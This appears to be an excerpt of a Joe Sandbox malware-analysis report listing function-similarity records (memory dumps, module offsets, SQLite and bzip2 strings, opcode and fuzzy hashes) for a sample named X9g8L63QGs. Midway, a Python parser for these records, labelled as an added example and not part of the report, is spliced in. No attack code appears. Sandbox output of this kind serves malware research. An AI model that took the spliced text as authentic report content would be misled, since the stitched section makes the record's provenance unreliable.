                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                                                                                                                                                                                                                                    • API String ID: 0-2474432645
                                                                                                                                                                                                                                                                    • Opcode ID: 7d4c9588c4fc757401baa0773cfa85e09fcd74270353b5995134900e9188f0ce
                                                                                                                                                                                                                                                                    • Instruction ID: 8e059a7a1ed1b2e84c82f198e456f74ef77358453c15df3e53f104cf99b61c19
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d4c9588c4fc757401baa0773cfa85e09fcd74270353b5995134900e9188f0ce
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941A5B9A1ED42D6EB748F34E09037E2292FB44B64F14E235D90E86AE5EE3CA441C710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
• Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID: Q2"e
• API String ID: 2933794660-2497648249
• Opcode ID: e26e1e7f29a364d318d08a9c47668167dc9c5e6d7c755545a2497d229ed19d67
• Instruction ID: dcb73aad10c883c3275b6541c0a807e214e2a25221b3a6b99b38f620e08775bf
• Opcode Fuzzy Hash: e26e1e7f29a364d318d08a9c47668167dc9c5e6d7c755545a2497d229ed19d67
• Instruction Fuzzy Hash: 81114C6AB14F058AEB10DF70E8553AA33A4FB187A8F042E31DA2D42BA4DF3CE1558340
APIs
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFB0C0A9F87,?,00000007,?), ref: 00007FFB0C0A9917
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %.*z:%u$column%d$rowid
• API String ID: 3122504284-2903559916
• Opcode ID: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
• Instruction ID: 1c25b8b936a5143f8487b37e24dc6381904feb993db5c507442b5e17e6e45f4b
• Opcode Fuzzy Hash: efce2a594c8615c6195497c0eb65d48d2a67f449694f3429559b3ef3d31313fd
• Instruction Fuzzy Hash: 33B1CEE2B0968285FA699F25D448BBA67A0EF41B84F494275DE5D0B7D5FF3CE801C308
APIs
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFB0C0B8A6F), ref: 00007FFB0C0B8739
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFB0C0B8A6F), ref: 00007FFB0C0B87BB
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFB0C0B8A6F), ref: 00007FFB0C0B88AD
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: RETURNING may not use "TABLE.*" wildcards
• API String ID: 3122504284-2313493979
• Opcode ID: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
• Instruction ID: 58f7db47ab2c7a1fb29ca4ac7f6d0bc383f278f01cbe8ae1c9ff44d163114930
• Opcode Fuzzy Hash: 17f7c90136fb561778db9ab3758a5a3b376a01926fa97c884be4e8f3c66a5517
• Instruction Fuzzy Hash: F2B1BCE2A08B8186E720CF25D4486A977A6FF55BA4F058335DE6D077E5EF38E191C304
APIs
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFB0C067847), ref: 00007FFB0C06D52A
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFB0C067847), ref: 00007FFB0C06D554
• 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFB0C067847), ref: 00007FFB0C06D5A7
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: H
• API String ID: 3122504284-2852464175
• Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
• Instruction ID: 8f85c541d12cdbbd215e93c33dca39651e27dcd99f58a3bfe0b8f1c9b0f7c46a
• Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
• Instruction Fuzzy Hash: 6E919FE2B197418AEB248F26D444B3967A1FF84B94F144635EEAD47B94EF3CE450CB08
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: %s.%s$column%d$rowid
• API String ID: 0-1505470444
• Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
• Instruction ID: df64814a8c2743da89c893950dafb210c1ee46baf7b296032887fe9f1ef5d139
• Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
• Instruction Fuzzy Hash: 949189F2B08B8185EA20DB25D448BAA67A4FF45BA4F444326DEBD477E5EF38D441C304
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 0-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                                    • Instruction ID: 7678807d70b5a8ca8b9249b3c4c9f733c4ee7386a4b8c80f01bef0dd72a138b0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D181E8E26086D19AE7548B35D588ABF7BA0FF40B84F048636DB8D87681EF3CE495C744
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3459038510
                                                                                                                                                                                                                                                                    • Opcode ID: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
                                                                                                                                                                                                                                                                    • Instruction ID: 6761270e23b2cf3da68567366fff8e4becb38ce2c23111274279fcbd35610e49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB61D6E2B0858286DB158F25E4446B9B7A2BF80BA4F448235DE9D477E1EF3DD44AC704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-3357347091
                                                                                                                                                                                                                                                                    • Opcode ID: c5541a520e518ba75f4c3a1f0d11ee1cc57c429cfdd7a83228e764fc4722281d
                                                                                                                                                                                                                                                                    • Instruction ID: a536931089c1c7dc81e88dfe23febce638c84ab6b35d52f95f216544e85cd7dc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5541a520e518ba75f4c3a1f0d11ee1cc57c429cfdd7a83228e764fc4722281d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5861D6BAB15A12D6E620EF36F4553BB2392FB85F54F14A035CE0907B66DE3DE4028740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                                                                                    • Instruction ID: 691f324cf1aa27353b3a0c0d8b252cab02f2ef074516e848f7743b1eda0cbc49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6877663b72478c921046e8b62552550de42e283109204e7406cf9fbc6b57853
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 515192F2A19E028BDB54EB25D04C6FA2793EB45BA8F608131DA5D47758DF7CE841C740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                                    • Instruction ID: 416c838c855d0a57efb00866271581d64c1669c6827dc6ce701df0411d8a4a2b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2951EFF2608BC0C5CB118B6AE4889AEBB64FB54B84F55813AEB8E43795EB3CD445C704
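The per-function records above (one "Memory Dump Source … Similarity" group per function, fields as bullets) are easier to work with once pivoted by the module base given in "Offset". The following Python is an added example, not code from Joe Sandbox or its IDA plugin. It assumes the text layout exactly as rendered on this page; treating "$" inside "String ID" as the separator between the individual strings a function references is this example's assumption, not something the report states. The sample input is constructed from two of the records above, with the rendered page's "Download File" link text left fused to one Associated entry so the clean-up is exercised.

```python
"""Parse Joe Sandbox per-function similarity records and pivot them by module.

Added example (not Joe Sandbox or IDA plugin code). Assumes: a record starts at a
"Memory Dump Source" line, fields are "• Key: Value" bullets, and "Source File"
carries the module base as "Offset: <hex>". The "$" string separator is an assumption.
"""
import re
from collections import defaultdict

# Constructed sample: two records in the report's layout; one Associated line keeps
# the "Download File" widget text that the rendered page fuses onto dump names.
SAMPLE_REPORT = """\
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
• API String ID: 3122504284-3727861699
• Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
• Instruction ID: 416c838c855d0a57efb00866271581d64c1669c6827dc6ce701df0411d8a4a2b
• Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
• Instruction Fuzzy Hash: 2951EFF2608BC0C5CB118B6AE4889AEBB64FB54B84F55813AEB8E43795EB3CD445C704
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007
• String ID: block %d: crc = 0x%08x, combined CRC = 0x%08x, size = %d$ final combined CRC = 0x%08x
• API String ID: 3568877910-3357347091
• Opcode ID: c5541a520e518ba75f4c3a1f0d11ee1cc57c429cfdd7a83228e764fc4722281d
• Instruction ID: a536931089c1c7dc81e88dfe23febce638c84ab6b35d52f95f216544e85cd7dc
• Opcode Fuzzy Hash: c5541a520e518ba75f4c3a1f0d11ee1cc57c429cfdd7a83228e764fc4722281d
• Instruction Fuzzy Hash: 5861D6BAB15A12D6E620EF36F4553BB2392FB85F54F14A035CE0907B66DE3DE4028740
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$"
)
LINK_RESIDUE = "Download File"  # page widget text, not part of the dump name
SCALAR_FIELDS = {"Snapshot File", "API ID", "API String ID", "Opcode ID",
                 "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}


def _strip_residue(value):
    return value[: -len(LINK_RESIDUE)].strip() if value.endswith(LINK_RESIDUE) else value


def parse_records(text):
    """Return one dict per function record; scalar fields keyed as snake_case."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"associated": [], "strings": []}
            records.append(cur)
            continue
        m = FIELD_RE.match(line) if cur is not None else None
        if not m:
            continue  # headings such as "Similarity", "APIs", "Strings"
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            sm = SOURCE_RE.match(value)
            if sm is None:
                raise ValueError("unrecognised Source File line: " + value)
            cur["source_file"] = sm["file"]
            cur["module_base"] = int(sm["offset"], 16)
            cur["based_on_pe"] = sm["pe"] == "true"
        elif key == "Associated":
            cur["associated"].append(_strip_residue(value))
        elif key == "String ID":
            # Assumption: "$" separates the individual strings the function references.
            cur["strings"] = [s for s in value.split("$") if s]
        elif key in SCALAR_FIELDS:
            cur[key.lower().replace(" ", "_")] = value
    return records


def group_by_module(records):
    """Module base address -> function records dumped from that module."""
    by_base = defaultdict(list)
    for rec in records:
        by_base[rec["module_base"]].append(rec)
    return dict(by_base)


def strings_by_module(records):
    """Module base address -> sorted unique strings, for attributing a dump to a library."""
    out = defaultdict(set)
    for rec in records:
        out[rec["module_base"]].update(rec["strings"])
    return {base: sorted(strs) for base, strs in out.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for base, strs in strings_by_module(recs).items():
        print(f"{base:#018x}: {len(group_by_module(recs)[base])} function(s), strings={strs}")
```

Grouping on "Offset" rather than on "Source File" matters because the several dumps listed as Associated all belong to one module base; the Opcode and Instruction fuzzy hashes are kept verbatim so a later run can compare them across reports.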
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2410398255
                                                                                                                                                                                                                                                                    • Opcode ID: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                                                    • Instruction ID: f1f34a75351eb180d12df4863143450f8bffbbd1b4ac085409ec7e93f9149d45
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F961CEE2A0879282E7149B36D158A7E6764FF45B98F104032EE8D07B95EF3CE842C714
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: (join-%u)$(subquery-%u)
• API String ID: 3122504284-2916047017
• Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
• Instruction ID: 200d501f2a89163f8c24da8936d99148288deb55dc908823d71b3197d6e8f25b
• Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
• Instruction Fuzzy Hash: C751ADF7A1865282EA668E35D048F3963A5FF14BA8F568731DA3D036C4EF2CE841C744
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: abort$CreateFrameInfo__except_validate_context_record
• String ID: csm
• API String ID: 444109036-1018135373
• Opcode ID: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
• Instruction ID: 008a86f0bc0cb3b193fefae333a2dc1ba1ca4a406b02ad3951c1125625fd7603
• Opcode Fuzzy Hash: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
• Instruction Fuzzy Hash: 78515FF2618B4187E620AB65E4446EF7BA6FB8ABA0F201535DB8D47755CF3CE850CB40
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
